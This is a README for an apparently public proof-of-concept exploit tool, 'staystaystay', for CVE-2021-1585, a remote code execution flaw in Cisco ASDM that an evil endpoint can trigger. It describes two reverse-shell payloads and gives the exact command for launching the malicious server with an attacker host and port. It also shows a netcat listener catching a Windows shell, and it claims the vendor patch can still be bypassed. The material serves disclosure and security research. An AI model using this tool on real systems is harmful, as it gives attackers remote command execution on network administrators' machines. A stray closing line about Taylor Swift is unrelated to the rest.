staystaystay is a proof of concept exploit for CVE-2021-1585, a man in the middle or evil endpoint RCE issue affecting Cisco ASA Device Manager (ASDM). The issue was originally discovered by Malcolm Lashley and disclosed in the summer of 2021. However, at the time I was looking at this, it was unpatched in the latest version (ASDM 7.17(1)), I stumbled upon this independently.
Cisco "fixed" this in ASDM 7.18(1.152). I say "fixed" because this exploit still works just fine. The user will just need to click "Yes". See a video below.
Attackers can configure two types of payloads to obtain a reverse shell to the victim:
- jjs.exe based (a file touches disk - and this has recently been caught by Windows Defender)
- Longtime Sunshine based
If a victim connects their ASDM to staystaystay then it will inject the configured payload resulting in a reverse shell. The jjs reverse shell can be caught with a typical nc listener (or even Metasploit, if you'd like). The Longtime Sunshine option requires the attacker use that framework.
As an example, the following command will start staystaystay on port 8443 with the jjs payload:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Once the victim connects to 8443, a reverse shell will be generated to 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
The following video contains an example of exploition with Longtime Sunshine:
The following video demonstrates the attack against a patched version:
An AttackerKB write up can be found here:
- Taylor Swift - Acoustic version